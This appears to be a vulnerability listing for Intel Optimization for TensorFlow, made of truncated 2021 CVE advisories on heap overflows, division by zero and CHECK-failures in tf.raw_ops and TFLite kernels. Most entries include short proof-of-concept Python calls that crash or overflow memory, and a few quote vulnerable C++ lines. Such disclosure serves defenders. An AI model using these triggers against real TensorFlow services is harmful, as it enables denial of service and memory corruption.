Intel Optimization For Tensorflow vulnerabilities

CVE-2021-29512 [LOW] CWE-120 Heap buffer overflow in `RaggedBinCount` Heap buffer overflow in `RaggedBinCount` ### Impact If the `splits` argument of `RaggedBincount` does not specify a valid [`SparseTensor`](https://www.tensorflow.org/api_docs/python/tf/sparse/SparseTensor), then an attacker can trigger a heap buffer overflow: ```python import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False) ``` This will cause a read

CVE-2021-29535 [LOW] CWE-131 Heap buffer overflow in `QuantizedMul` Heap buffer overflow in `QuantizedMul` ### Impact An attacker can cause a heap buffer overflow in `QuantizedMul` by passing in invalid thresholds for the quantization: ```python import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], d

CVE-2021-29594 [LOW] CWE-369 Division by zero in TFLite's convolution code Division by zero in TFLite's convolution code ### Impact TFLite's [convolution code](https://github.com/tensorflow/tensorflow/blob/09c73bca7d648e961dd05898292d91a8322a9d45/tensorflow/lite/kernels/conv.cc) has multiple division where the divisor is controlled by the user and not checked to be non-zero. For example: ```cc const int input_size = NumElements(input) / SizeOfDimension(input, 0); ``` ### Patches We have patch

CVE-2021-29549 [LOW] CWE-369 Division by 0 in `QuantizedAdd` Division by 0 in `QuantizedAdd` ### Impact An attacker can cause a runtime division by zero error and denial of service in `tf.raw_ops.QuantizedAdd`: ```python import tensorflow as tf x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8) y = tf.constant([], shape=[2, 0], dtype=tf.quint8) min_x = tf.constant(10.723421015884028) max_x = tf.constant(15.19578006631113) min_y = tf.constant(-5.539003866682977) max_y = tf.constant(42.

CVE-2021-29562 [LOW] CWE-617 CHECK-fail in `tf.raw_ops.IRFFT` CHECK-fail in `tf.raw_ops.IRFFT` ### Impact An attacker can cause a denial of service by exploiting a `CHECK`-failure coming from the implementation of `tf.raw_ops.IRFFT`: ```python import tensorflow as tf values = [-10.0] * 130 values[0] = -9.999999999999995 inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32) inputs = tf.cast(inputs, dtype=tf.complex64) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_op

CVE-2021-29578 [LOW] CWE-119 Heap buffer overflow in `FractionalAvgPoolGrad` Heap buffer overflow in `FractionalAvgPoolGrad` ### Impact The implementation of `tf.raw_ops.FractionalAvgPoolGrad` is vulnerable to a heap buffer overflow: ```python import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_seq

CVE-2021-29559 [LOW] CWE-125 Heap OOB access in unicode ops Heap OOB access in unicode ops ### Impact An attacker can access data outside of bounds of heap allocated array in `tf.raw_ops.UnicodeEncode`: ```python import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_

CVE-2021-29533 [LOW] CWE-754 CHECK-fail in DrawBoundingBoxes CHECK-fail in DrawBoundingBoxes ### Impact An attacker can trigger a denial of service via a `CHECK` failure by passing an empty image to `tf.raw_ops.DrawBoundingBoxes`: ```python import tensorflow as tf images = tf.fill([53, 0, 48, 1], 0.) boxes = tf.fill([53, 31, 4], 0.) boxes = tf.Variable(boxes) boxes[0, 0, 0].assign(3.90621) tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes) ``` This is because the [implementation](https

CVE-2021-29587 [LOW] CWE-369 Division by zero in TFLite's implementation of `SpaceToDepth` Division by zero in TFLite's implementation of `SpaceToDepth` ### Impact The `Prepare` step of the `SpaceToDepth` TFLite operator [does not check for 0 before division](https://github.com/tensorflow/tensorflow/blob/5f7975d09eac0f10ed8a17dbb6f5964977725adc/tensorflow/lite/kernels/space_to_depth.cc#L63-L67). ```cc const int block_size = params->block_size; const int input_height = input->dims->data[1]; con

CVE-2021-29537 [LOW] CWE-131 Heap buffer overflow in `QuantizedResizeBilinear` Heap buffer overflow in `QuantizedResizeBilinear` ### Impact An attacker can cause a heap buffer overflow in `QuantizedResizeBilinear` by passing in invalid thresholds for the quantization: ```python import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops

CVE-2021-29560 [LOW] CWE-125 Heap buffer overflow in `RaggedTensorToTensor` Heap buffer overflow in `RaggedTensorToTensor` ### Impact An attacker can cause a heap buffer overflow in `tf.raw_ops.RaggedTensorToTensor`: ```python import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,

CVE-2021-29573 [LOW] CWE-369 Division by 0 in `MaxPoolGradWithArgmax` Division by 0 in `MaxPoolGradWithArgmax` ### Impact The implementation of `tf.raw_ops.MaxPoolGradWithArgmax` is vulnerable to a division by 0: ```python import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) argmax = tf.constant([], shape=[0], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgm

CVE-2021-29520 [LOW] CWE-120 Heap buffer overflow in `Conv3DBackprop*` Heap buffer overflow in `Conv3DBackprop*` ### Impact Missing validation between arguments to `tf.raw_ops.Conv3DBackprop*` operations can result in heap buffer overflows: ```python import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0,

CVE-2021-29572 [LOW] CWE-476 Reference binding to nullptr in `SdcaOptimizer` Reference binding to nullptr in `SdcaOptimizer` ### Impact The implementation of `tf.raw_ops.SdcaOptimizer` triggers undefined behavior due to dereferencing a null pointer: ```python import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse

CVE-2021-29534 [LOW] CWE-754 CHECK-fail in SparseConcat CHECK-fail in SparseConcat ### Impact An attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.SparseConcat`: ```python import tensorflow as tf import numpy as np indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64) indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.zeros([0], dtype=tf.int64) values_2 = tf.zeros([0], dtype=tf.int64) values =

CVE-2021-29546 [LOW] CWE-369 Division by 0 in `QuantizedBiasAdd` Division by 0 in `QuantizedBiasAdd` ### Impact An attacker can trigger an integer division by zero undefined behavior in `tf.raw_ops.QuantizedBiasAdd`: ```python import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) bias = tf.constant([], shape=[0], dtype=tf.quint8) min_input = tf.constant(-10.0, dtype=tf.float32) max_input = tf.constant(-10.0, dtype=tf.float32) min_bias = tf.constant(-10.0,

CVE-2021-29600 [LOW] CWE-369 Division by zero in TFLite's implementation of `OneHot` Division by zero in TFLite's implementation of `OneHot` ### Impact The implementation of the `OneHot` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/f61c57bd425878be108ec787f4d96390579fb83e/tensorflow/lite/kernels/one_hot.cc#L68-L72): ```cc int prefix_dim_size = 1; for (int i = 0; i dims->data[i]; } const int suffix_dim_size = NumElements(op_context.in

CVE-2021-29568 [LOW] CWE-476 Reference binding to null in `ParameterizedTruncatedNormal` Reference binding to null in `ParameterizedTruncatedNormal` ### Impact An attacker can trigger undefined behavior by binding to null pointer in `tf.raw_ops.ParameterizedTruncatedNormal`: ```python import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxv

CVE-2021-29542 [LOW] CWE-131 Heap buffer overflow in `StringNGrams` Heap buffer overflow in `StringNGrams` ### Impact An attacker can cause a heap buffer overflow by passing crafted inputs to `tf.raw_ops.StringNGrams`: ```python import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l,

CVE-2021-29597 [LOW] CWE-369 Division by zero in TFLite's implementation of `SpaceToBatchNd` Division by zero in TFLite's implementation of `SpaceToBatchNd` ### Impact The implementation of the `SpaceToBatchNd` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/412c7d9bb8f8a762c5b266c9e73bfa165f29aac8/tensorflow/lite/kernels/space_to_batch_nd.cc#L82-L83): ```cc TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0); output_size->